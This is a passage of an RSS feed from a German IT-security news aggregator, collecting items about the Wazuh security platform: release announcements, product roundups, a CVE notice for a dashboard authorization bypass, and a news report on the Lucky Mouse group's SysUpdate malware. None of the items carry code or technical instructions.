<pubDate>Thu, 07 Dec 2023 12:35:38 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Threat intelligence refers to gathering, processing, and analyzing cyber threats, along with proactive defensive measures aimed at strengthening security. It enables organizations to gain a comprehensive insight into historical, present, and anticipated threats, providing context about the constantly evolving threat landscape.
Importance of threat intelligence in the cybersecurity ecosystem]]></content:encoded>
</item>
<item>
<title><![CDATA[Leveraging Wazuh to combat insider threats]]></title>
<description><![CDATA[Effective strategies for mitigating insider threats involve a combination of detective and preventive controls. Such controls are provided by the Wazuh SIEM and XDR platform. [...]]]></description>
<link>https://tsecurity.de/de/1941589/it-security-nachrichten/leveraging-wazuh-to-combat-insider-threats/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1941589/it-security-nachrichten/leveraging-wazuh-to-combat-insider-threats/</guid>
<pubDate>Mon, 27 Nov 2023 19:55:56 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Effective strategies for mitigating insider threats involve a combination of detective and preventive controls. Such controls are provided by the Wazuh SIEM and XDR platform. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Infosec products of the month: October 2023]]></title>
<description><![CDATA[Here’s a look at the most interesting products from the past month, featuring releases from: Appdome, Arcitecta, AuditBoard, BackBox, Cloaked, ComplyCube, Darktrace, Data Theorem, Flexxon, Fortanix, Fortinet, Jumio, LogicMonitor, Malwarebytes, ManageEngine, Nutanix, Prevalent, Progress, SailPoint...]]></description>
<link>https://tsecurity.de/de/1913184/it-security-nachrichten/infosec-products-of-the-month-october-2023/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1913184/it-security-nachrichten/infosec-products-of-the-month-october-2023/</guid>
<pubDate>Wed, 01 Nov 2023 04:33:40 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Here’s a look at the most interesting products from the past month, featuring releases from: Appdome, Arcitecta, AuditBoard, BackBox, Cloaked, ComplyCube, Darktrace, Data Theorem, Flexxon, Fortanix, Fortinet, Jumio, LogicMonitor, Malwarebytes, ManageEngine, Nutanix, Prevalent, Progress, SailPoint, Thales, Vanta, Veriff, and Wazuh. Veriff unveils fraud mitigation solutions Veriff launched its new Fraud Protect &amp; Fraud Intelligence packages. Both packages use advanced machine learning models, behavioral insights, and Veriff’s in-house fraud detection expertise to enhance organizations’ ability to … <a href="https://www.helpnetsecurity.com/2023/11/01/infosec-products-of-the-month-october-2023/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a rel="nofollow" href="https://www.helpnetsecurity.com/2023/11/01/infosec-products-of-the-month-october-2023/">Infosec products of the month: October 2023</a> appeared first on <a rel="nofollow" href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-42455 | Wazuh 4.4.0/4.4.1 Dashboard authorization (ID 5427)]]></title>
<description><![CDATA[A vulnerability has been found in Wazuh 4.4.0/4.4.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the component Dashboard. The manipulation leads to authorization bypass.

This vulnerability is known as CVE-2023-42455. The attack can be launched remotel...]]></description>
<link>https://tsecurity.de/de/1908638/sicherheitsluecken/cve-2023-42455-wazuh-440441-dashboard-authorization-id-5427/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1908638/sicherheitsluecken/cve-2023-42455-wazuh-440441-dashboard-authorization-id-5427/</guid>
<pubDate>Fri, 27 Oct 2023 17:06:33 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/?product.wazuh">Wazuh 4.4.0/4.4.1</a> and classified as <a href="https://vuldb.com/?kb.risk">critical</a>. Affected by this vulnerability is an unknown functionality of the component <em>Dashboard</em>. The manipulation leads to authorization bypass.

This vulnerability is known as <a href="https://vuldb.com/?source_cve.241591">CVE-2023-42455</a>. The attack can be launched remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[New infosec products of the week: October 27, 2023]]></title>
<description><![CDATA[Here’s a look at the most interesting products from the past week, featuring releases from Darktrace, Data Theorem, Jumio, Malwarebytes, Progress, and Wazuh. Progress Flowmon ADS 12.2 AI offers advanced security event monitoring Flowmon ADS 12.2 harnesses the power of artificial intelligence to p...]]></description>
<link>https://tsecurity.de/de/1907737/it-security-nachrichten/new-infosec-products-of-the-week-october-27-2023/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1907737/it-security-nachrichten/new-infosec-products-of-the-week-october-27-2023/</guid>
<pubDate>Fri, 27 Oct 2023 05:03:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Here’s a look at the most interesting products from the past week, featuring releases from Darktrace, Data Theorem, Jumio, Malwarebytes, Progress, and Wazuh. Progress Flowmon ADS 12.2 AI offers advanced security event monitoring Flowmon ADS 12.2 harnesses the power of artificial intelligence to provide an advanced and holistic view of detected security events, empowering cybersecurity professionals to identify those that are important, prioritize them with context, guide efficient decision-making and respond quickly. Malwarebytes Identity Theft … <a href="https://www.helpnetsecurity.com/2023/10/27/new-infosec-products-of-the-week-october-27-2023/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a rel="nofollow" href="https://www.helpnetsecurity.com/2023/10/27/new-infosec-products-of-the-week-october-27-2023/">New infosec products of the week: October 27, 2023</a> appeared first on <a rel="nofollow" href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh: Free and open-source XDR and SIEM]]></title>
<description><![CDATA[Wazuh is an open-source platform designed for threat detection, prevention, and response. It can safeguard workloads in on-premises, virtual, container, and cloud settings. Wazuh system comprises an endpoint security agent installed on monitored systems and a management server that processes and ...]]></description>
<link>https://tsecurity.de/de/1902601/it-security-nachrichten/wazuh-free-and-open-source-xdr-and-siem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1902601/it-security-nachrichten/wazuh-free-and-open-source-xdr-and-siem/</guid>
<pubDate>Tue, 24 Oct 2023 04:03:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Wazuh is an open-source platform designed for threat detection, prevention, and response. It can safeguard workloads in on-premises, virtual, container, and cloud settings. Wazuh system comprises an endpoint security agent installed on monitored systems and a management server that processes and examines the data from these agents. Additionally, it seamlessly integrates with the Elastic Stack, offering a search and data visualization feature that lets users explore their security notifications. Wazuh capabilities: Intrusion detection Log data … <a href="https://www.helpnetsecurity.com/2023/10/24/wazuh-open-source-xdr-siem/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a rel="nofollow" href="https://www.helpnetsecurity.com/2023/10/24/wazuh-open-source-xdr-siem/">Wazuh: Free and open-source XDR and SIEM</a> appeared first on <a rel="nofollow" href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New infosec products of the week: April 14, 2023]]></title>
<description><![CDATA[Here’s a look at the most interesting products from the past week, featuring releases from BigID, Binarly, Cynalytica, GitGuardian, Netskope, Searchlight Cyber, ThreatX, and Wazuh. Cynalytica OTNetGuard provides visibility into critical infrastructure networks Cynalytica has launced its Industria...]]></description>
<link>https://tsecurity.de/de/1865188/it-security-nachrichten/new-infosec-products-of-the-week-april-14-2023/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1865188/it-security-nachrichten/new-infosec-products-of-the-week-april-14-2023/</guid>
<pubDate>Fri, 14 Apr 2023 06:34:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Here’s a look at the most interesting products from the past week, featuring releases from BigID, Binarly, Cynalytica, GitGuardian, Netskope, Searchlight Cyber, ThreatX, and Wazuh. Cynalytica OTNetGuard provides visibility into critical infrastructure networks Cynalytica has launced its Industrial Control System (ICS/SCADA) monitoring sensor, OTNetGuard, that passively and securely captures analog, serial, and IP communications closing the capabilities gap in complete monitoring of OT networks. GitGuardian Honeytoken helps companies secure their software supply chains With attackers … <a href="https://www.helpnetsecurity.com/2023/04/14/new-infosec-products-of-the-week-april-14-2023/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a rel="nofollow" href="https://www.helpnetsecurity.com/2023/04/14/new-infosec-products-of-the-week-april-14-2023/">New infosec products of the week: April 14, 2023</a> appeared first on <a rel="nofollow" href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh 4.4 combats breaches, ransomware, and cyberattacks all from a single agent]]></title>
<description><![CDATA[Wazuh launched Wazuh 4.4, the latest version of its open source security platform. The latest version adds multiple new features, including IPv6 support for the enrollment process and agent-manager connection, and support for Azure integration within Linux agents. Today’s leading enterprises requ...]]></description>
<link>https://tsecurity.de/de/1863532/it-security-nachrichten/wazuh-44-combats-breaches-ransomware-and-cyberattacks-all-from-a-single-agent/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1863532/it-security-nachrichten/wazuh-44-combats-breaches-ransomware-and-cyberattacks-all-from-a-single-agent/</guid>
<pubDate>Thu, 13 Apr 2023 04:05:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Wazuh launched Wazuh 4.4, the latest version of its open source security platform. The latest version adds multiple new features, including IPv6 support for the enrollment process and agent-manager connection, and support for Azure integration within Linux agents. Today’s leading enterprises require world-class protection of workloads across on-premises, virtualized, containerized, and cloud-based environments. Wazuh 4.4 enhances the comprehensive and customizable solution with greater flexibility to combat breaches, ransomware, and cyberattacks all from a single agent. … <a href="https://www.helpnetsecurity.com/2023/04/13/wazuh-4-4/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a rel="nofollow" href="https://www.helpnetsecurity.com/2023/04/13/wazuh-4-4/">Wazuh 4.4 combats breaches, ransomware, and cyberattacks all from a single agent</a> appeared first on <a rel="nofollow" href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh launches version 4.4 with a suite of new capabilities]]></title>
<description><![CDATA[Open source security provider Wazuh has launched the latest version of its unified extended detection and response (XDR) and security information and event management (SIEM) platform with a suite of upgraded capabilities.Wazuh 4.4 adds a string of new features to Wazuh agents and managers, which ...]]></description>
<link>https://tsecurity.de/de/1858650/it-security-nachrichten/wazuh-launches-version-44-with-a-suite-of-new-capabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1858650/it-security-nachrichten/wazuh-launches-version-44-with-a-suite-of-new-capabilities/</guid>
<pubDate>Wed, 12 Apr 2023 16:49:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<article><section class="page"><p><a href="https://www.infoworld.com/article/3689882/companies-cant-stop-using-open-source.html">Open source</a> security provider Wazuh has launched the latest version of its unified extended detection and response (<a href="https://www.csoonline.com/article/3684850/11-top-xdr-tools-and-how-to-evaluate-them.html">XDR</a>) and security information and event management (<a href="https://www.csoonline.com/article/2124604/what-is-siem-security-information-and-event-management-explained.html">SIEM</a>) platform with a suite of upgraded capabilities.</p><p>Wazuh 4.4 adds a string of new features to Wazuh agents and managers, which users deploy on endpoints and servers respectively. These features include support for IPv6 for agent-manager connections, search upgrade to OpenSearch v2.4.1, <a href="https://www.csoonline.com/article/3537230/what-are-vulnerability-scanners-and-how-do-they-work.html">vulnerability detection</a> for Suse Linux, updates to Linux software composition analysis (SCA) policies, and Azure integrations in Linux agents.</p><p class="jumpTag"><a href="https://www.csoonline.com/article/3692878/wazuh-launches-version-4-4-with-a-suite-of-new-capabilities.html#jump">To read this article in full, please click here</a></p></section></article>]]></content:encoded>
</item>
<item>
<title><![CDATA[Protecting your business with Wazuh: The open source security platform]]></title>
<description><![CDATA[Today, businesses face a variety of security challenges like cyber attacks, compliance requirements, and endpoint security administration. The threat landscape constantly evolves, and it can be overwhelming for businesses to keep up with the latest security trends. Security teams use processes an...]]></description>
<link>https://tsecurity.de/de/1855273/it-security-nachrichten/protecting-your-business-with-wazuh-the-open-source-security-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1855273/it-security-nachrichten/protecting-your-business-with-wazuh-the-open-source-security-platform/</guid>
<pubDate>Mon, 10 Apr 2023 11:48:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Today, businesses face a variety of security challenges like cyber attacks, compliance requirements, and endpoint security administration. The threat landscape constantly evolves, and it can be overwhelming for businesses to keep up with the latest security trends. Security teams use processes and security solutions to curb these challenges. These solutions include firewalls, antiviruses, data]]></content:encoded>
</item>
<item>
<title><![CDATA[Securing cloud workloads with Wazuh - an open source, SIEM and XDR platform]]></title>
<description><![CDATA[Wazuh is a free, open source security platform that offers Unified XDR and SIEM capabilities. Learn how Wazuh detect and defend against security threats targeting cloud environments. [...]]]></description>
<link>https://tsecurity.de/de/1810494/it-security-nachrichten/securing-cloud-workloads-with-wazuh-an-open-source-siem-and-xdr-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1810494/it-security-nachrichten/securing-cloud-workloads-with-wazuh-an-open-source-siem-and-xdr-platform/</guid>
<pubDate>Tue, 07 Mar 2023 06:26:54 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wazuh is a free, open source security platform that offers Unified XDR and SIEM capabilities. Learn how Wazuh detect and defend against security threats targeting cloud environments. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Lucky Mouse threat group launches Linux malware toolkit called SysUpdate for targeted attacks]]></title>
<description><![CDATA[Lucky Mouse threat group launches Linux malware toolkit called SysUpdate for targeted attacks
				
				
			
			
				
				
				
				
			
				
				
				
				
				
				
				
				
				
				
				
				 Post Views: 114
			
			
				
				
				
				
				 
			
			
				
				
				
				
			
				
				
				
		...]]></description>
<link>https://tsecurity.de/de/1810339/hacking/lucky-mouse-threat-group-launches-linux-malware-toolkit-called-sysupdate-for-targeted-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1810339/hacking/lucky-mouse-threat-group-launches-linux-malware-toolkit-called-sysupdate-for-targeted-attacks/</guid>
<pubDate>Tue, 07 Mar 2023 06:24:22 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="et_pb_section et_pb_section_2 et_section_specialty">
				
				
				
				
				
				<div class="et_pb_row">
				<div class="et_pb_column et_pb_column_3_4 et_pb_column_4   et_pb_specialty_column  et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_row_inner et_pb_row_inner_10">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_10 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_post_title et_pb_post_title_2 et_pb_bg_layout_light  et_pb_text_align_left">
				
				
				
				
				
				<div class="et_pb_title_container">
					<h1 class="entry-title">Lucky Mouse threat group launches Linux malware toolkit called SysUpdate for targeted attacks</h1>
				</div>
				
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_11">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_11 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_32  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><div class="post-views content-post post-271352 entry-meta">
				<span class="post-views-icon dashicons dashicons-chart-bar"></span> <span class="post-views-label">Post Views:</span> <span class="post-views-count">114</span>
			</div></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_33  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><!-- News Adsense Adcode --><ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400" data-ad-format="auto" data-full-width-responsive="true"></ins> </div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_12 patreon-row et_clickable">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_12 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_divider et_pb_divider_6 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div><div class="et_pb_module et_pb_text et_pb_text_34  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 class="premium-content">Premium Content</h2></div>
			</div><div class="et_pb_module et_pb_image et_pb_image_4">
				
				
				
				
				<a href="http://patreon.com/posts/burp-suite-how-5-56263320" target="_blank"><span class="et_pb_image_wrap "><img decoding="async" width="500" height="150" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2022/12/Patreon.png" alt="Patreon" title="Patreon" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2022/12/Patreon.png 500w, https://www.blackhatethicalhacking.com/wp-content/uploads/2022/12/Patreon-480x144.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 500px, 100vw" class="wp-image-269595"></span></a>
			</div><div class="et_pb_module et_pb_text et_pb_text_35  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner">Subscribe to <a class="green_color" href="http://patreon.com/posts/burp-suite-how-5-56263320" target="_blank" rel="noopener sponsored">Patreon</a> to watch this episode.</div>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_7 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_13">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_13 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_36  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner">Reading Time: 3 Minutes</div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_14">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_14 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_37  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2><strong>Lucky Mouse develops Linux version of SysUpdate malware toolkit</strong></h2>
<p>The notorious Lucky Mouse threat group has launched a new Linux version of its SysUpdate malware toolkit, expanding its reach to target devices running on this operating system. Cybersecurity firm Trend Micro reported the earliest known version of this updated artifact dates back to July 2022, with new features designed to evade security software and resist reverse engineering. The group, also known as APT27, Bronze Union, Emissary Panda, and Iron Tiger, has been utilizing a variety of malware, including SysUpdate, HyperBro, PlugX, and a Linux backdoor named rshell.</p>
<p>Over the past two years, Lucky Mouse has been orchestrating campaigns that embrace supply chain compromises of legitimate apps, such as Able Desktop and MiMi Chat, to obtain remote access to compromised systems. The group’s targets have included a gambling company in the Philippines, a sector that has repeatedly come under attack from Iron Tiger since 2019.</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_38 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>See Also: So you want to be a hacker?<br></strong><strong><a href="https://www.blackhatethicalhacking.com/courses/" target="_blank" rel="noopener noreferrer">Offensive Security, Bug Bounty Courses</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_39  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><!-- News Adsense Adcode --><ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400" data-ad-format="auto" data-full-width-responsive="true"></ins> </div>
			</div><div class="et_pb_module et_pb_text et_pb_text_40  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2><strong>Windows version of SysUpdate can manage processes, take screenshots, and execute commands</strong></h2>
<p>While the exact infection vector used in the attack is unknown, it appears that the group has used installers disguised as messaging apps like Youdu as lures to activate the attack sequence. The Windows version of SysUpdate comes with several features to manage processes, take screenshots, carry out file operations, and execute arbitrary commands. It can also communicate with command-and-control servers via DNS TXT requests, a technique known as DNS tunneling. The development also marks the first time that a threat actor has been detected weaponizing a sideloading vulnerability in a Wazuh signed executable to deploy SysUpdate on Windows machines.</p>
<p>The Linux ELF samples, written in C++, are notable for using the Asio library to port the file handling functions, indicating that the adversary is looking to add cross-platform support for the malware. As rshell is already capable of running on Linux and macOS, Trend Micro has warned of the possibility that SysUpdate could have a macOS version in the future.</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_41 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/articles/security-engineer-vs-software-engineer/" target="_blank" rel="noopener noreferrer">Security Engineer vs. Software Engineer</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_42  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><!-- News Adsense Adcode --><ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400" data-ad-format="auto" data-full-width-responsive="true"></ins> </div>
			</div><div class="et_pb_module et_pb_text et_pb_text_43 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/tools/sqlmutant/" target="_blank" rel="noopener noreferrer">Offensive Security Tool: SQLMutant<br></a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_44  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><div class="w-full border-b border-black/10 dark:border-gray-900/50 text-gray-800 dark:text-gray-100 group bg-gray-50 dark:bg-[#444654]">
<div class="text-base gap-4 md:gap-6 m-auto md:max-w-2xl lg:max-w-2xl xl:max-w-3xl p-4 md:py-6 flex lg:px-0">
<div class="relative flex w-[calc(100%-50px)] flex-col gap-1 md:gap-3 lg:w-[calc(100%-115px)]">
<div class="flex flex-grow flex-col gap-3">
<div class="min-h-[20px] flex flex-col items-start gap-4 whitespace-pre-wrap">
<div class="markdown prose w-full break-words dark:prose-invert dark">
<div class="w-full border-b border-black/10 dark:border-gray-900/50 text-gray-800 dark:text-gray-100 group bg-gray-50 dark:bg-[#444654]">
<div class="text-base gap-4 md:gap-6 m-auto md:max-w-2xl lg:max-w-2xl xl:max-w-3xl p-4 md:py-6 flex lg:px-0">
<div class="relative flex w-[calc(100%-50px)] flex-col gap-1 md:gap-3 lg:w-[calc(100%-115px)]">
<div class="flex flex-grow flex-col gap-3">
<div class="min-h-[20px] flex flex-col items-start gap-4 whitespace-pre-wrap">
<div class="markdown prose w-full break-words dark:prose-invert dark">
<div class="w-full border-b border-black/10 dark:border-gray-900/50 text-gray-800 dark:text-gray-100 group bg-gray-50 dark:bg-[#444654]">
<div class="text-base gap-4 md:gap-6 m-auto md:max-w-2xl lg:max-w-2xl xl:max-w-3xl p-4 md:py-6 flex lg:px-0">
<div class="relative flex w-[calc(100%-50px)] flex-col gap-1 md:gap-3 lg:w-[calc(100%-115px)]">
<div class="flex flex-grow flex-col gap-3">
<div class="min-h-[20px] flex flex-col items-start gap-4 whitespace-pre-wrap">
<div class="markdown prose w-full break-words dark:prose-invert dark">
<div class="flex-1 overflow-hidden">
<div class="react-scroll-to-bottom--css-qxlqy-79elbk h-full dark:bg-gray-800">
<div class="react-scroll-to-bottom--css-qxlqy-1n7m0yu">
<div class="flex flex-col items-center text-sm dark:bg-gray-800">
<div class="w-full border-b border-black/10 dark:border-gray-900/50 text-gray-800 dark:text-gray-100 group bg-gray-50 dark:bg-[#444654]">
<div class="text-base gap-4 md:gap-6 m-auto md:max-w-2xl lg:max-w-2xl xl:max-w-3xl p-4 md:py-6 flex lg:px-0">
<div class="relative flex w-[calc(100%-50px)] flex-col gap-1 md:gap-3 lg:w-[calc(100%-115px)]">
<div class="flex flex-grow flex-col gap-3">
<div class="min-h-[20px] flex flex-col items-start gap-4 whitespace-pre-wrap">
<div class="markdown prose w-full break-words dark:prose-invert dark">
<div class="w-full border-b border-black/10 dark:border-gray-900/50 text-gray-800 dark:text-gray-100 group bg-gray-50 dark:bg-[#444654]">
<div class="text-base gap-4 md:gap-6 m-auto md:max-w-2xl lg:max-w-2xl xl:max-w-3xl p-4 md:py-6 flex lg:px-0">
<div class="relative flex w-[calc(100%-50px)] flex-col gap-1 md:gap-3 lg:w-[calc(100%-115px)]">
<div class="flex flex-grow flex-col gap-3">
<div class="min-h-[20px] flex flex-col items-start gap-4 whitespace-pre-wrap">
<div class="markdown prose w-full break-words dark:prose-invert dark">
<div class="w-full border-b border-black/10 dark:border-gray-900/50 text-gray-800 dark:text-gray-100 group bg-gray-50 dark:bg-[#444654]">
<div class="text-base gap-4 md:gap-6 m-auto md:max-w-2xl lg:max-w-2xl xl:max-w-3xl p-4 md:py-6 flex lg:px-0">
<div class="relative flex w-[calc(100%-50px)] flex-col gap-1 md:gap-3 lg:w-[calc(100%-115px)]">
<div class="flex flex-grow flex-col gap-3">
<div class="min-h-[20px] flex flex-col items-start gap-4 whitespace-pre-wrap">
<div class="markdown prose w-full break-words dark:prose-invert dark">
<div class="w-full border-b border-black/10 dark:border-gray-900/50 text-gray-800 dark:text-gray-100 group bg-gray-50 dark:bg-[#444654]">
<div class="text-base gap-4 md:gap-6 m-auto md:max-w-2xl lg:max-w-2xl xl:max-w-3xl p-4 md:py-6 flex lg:px-0">
<div class="relative flex w-[calc(100%-50px)] flex-col gap-1 md:gap-3 lg:w-[calc(100%-115px)]">
<div class="flex flex-grow flex-col gap-3">
<div class="min-h-[20px] flex flex-col items-start gap-4 whitespace-pre-wrap">
<div class="markdown prose w-full break-words dark:prose-invert dark">
<div class="w-full border-b border-black/10 dark:border-gray-900/50 text-gray-800 dark:text-gray-100 group bg-gray-50 dark:bg-[#444654]">
<div class="text-base gap-4 md:gap-6 m-auto md:max-w-2xl lg:max-w-2xl xl:max-w-3xl p-4 md:py-6 flex lg:px-0">
<div class="relative flex w-[calc(100%-50px)] flex-col gap-1 md:gap-3 lg:w-[calc(100%-115px)]">
<div class="flex flex-grow flex-col gap-3">
<div class="min-h-[20px] flex flex-col items-start gap-4 whitespace-pre-wrap">
<div class="markdown prose w-full break-words dark:prose-invert dark">
<div class="w-full border-b border-black/10 dark:border-gray-900/50 text-gray-800 dark:text-gray-100 group bg-gray-50 dark:bg-[#444654]">
<div class="text-base gap-4 md:gap-6 m-auto md:max-w-2xl lg:max-w-2xl xl:max-w-3xl p-4 md:py-6 flex lg:px-0">
<div class="relative flex w-[calc(100%-50px)] flex-col gap-1 md:gap-3 lg:w-[calc(100%-115px)]">
<div class="flex flex-grow flex-col gap-3">
<div class="min-h-[20px] flex flex-col items-start gap-4 whitespace-pre-wrap">
<div class="markdown prose w-full break-words dark:prose-invert dark">
<h2><strong>Custom Chrome password and cookie grabber also included in the toolkit</strong></h2>
<p>One tool of note is a custom Chrome password and cookie grabber that comes with features to harvest cookies and passwords stored in the web browser. Security researcher Daniel Lunghi confirmed that Lucky Mouse regularly updates its tools to add new features and probably to ease their portability to other platforms. He added that this development “corroborates this threat actor’s interest in the gambling industry and the Southeast Asia region.”</p>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_45 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/news/stealc-new-information-stealer-malware-emerges-on-dark-web/" target="_blank" rel="noopener noreferrer">Stealc, New Information Stealer Malware Emerges on Dark Web</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_46  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><blockquote><p><em>Are u a security researcher? Or a company that writes articles or write ups about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing?</em></p>
<p><em>If you want to express your idea in an article contact us here for a quote: <strong>info@blackhatethicalhacking.com</strong></em></p></blockquote></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_47  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Source: thehackernews.com</strong></p>
<p><a href="https://thehackernews.com/2023/03/new-cryptojacking-campaign-leverages.html" target="_blank" rel="noopener"><strong>Source Link</strong></a></p></div>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_8 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div><div class="et_pb_module et_pb_image et_pb_image_5 store-img">
				
				
				
				
